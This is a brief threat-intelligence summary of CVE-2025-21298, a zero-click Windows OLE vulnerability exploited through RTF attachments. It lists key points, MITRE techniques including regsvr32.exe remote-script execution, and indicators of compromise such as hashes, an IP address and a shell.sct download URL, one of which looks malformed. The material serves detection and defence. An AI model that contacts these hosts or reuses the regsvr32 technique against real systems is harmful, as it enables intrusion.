CVE-2025–21298 is a critical zero-click vulnerability in Windows OLE technology, facilitating the execution of malicious code without user interaction. Triggered via embedded OLE objects in RTF files, it allows attackers to gain system control, leading to malware installation and data exfiltration. Affected: Windows OLE, Rich Text Format (RTF) files
Keypoints :
- Critical zero-click vulnerability in Windows OLE (CVE-2025–21298).
- Exploits memory corruption in the ole32.dll library.
- Triggered by embedding OLE objects in RTF files.
- Enables exploitation through buffer overflow and use-after-free conditions.
- Email received with a malicious attachment flagged by security systems.
- Malware execution facilitated through regsvr32.exe using a remote script.
- Utilizes scrobj.dll for execution, leveraging fileless malware tactics.
- Analysis of embedded objects reveals small payloads potentially for further exploitation.
- Malicious hash recognized by 16 security vendors, indicating high risk.
MITRE Techniques :
- T1218: Signed Binary Proxy Execution – regsvr32.exe was used to execute a remote script.
- T1059.004: Command and Scripting Interpreter: Windows Batch – executed commands involved CMD and regsvr32.exe.
- T1071.001: Application Layer Protocol: Web Protocols – utilized HTTP to download a malicious shell script.
Indicator of Compromise :
- [MD5] 9d68678aeee52684bbe3c983222b1da3 (malicious RTF file hash)
- [MD5] f1d3ff8443297732862df21dc4e57262 (embedded object hash)
- [IPv4] 84.38.130.118 (IP address used to host malicious script)
- [Email] projectmanagement@pm.me (sender of the malicious email)
- [URL] http://84.38.130.118.com/shell.sct (script download URL)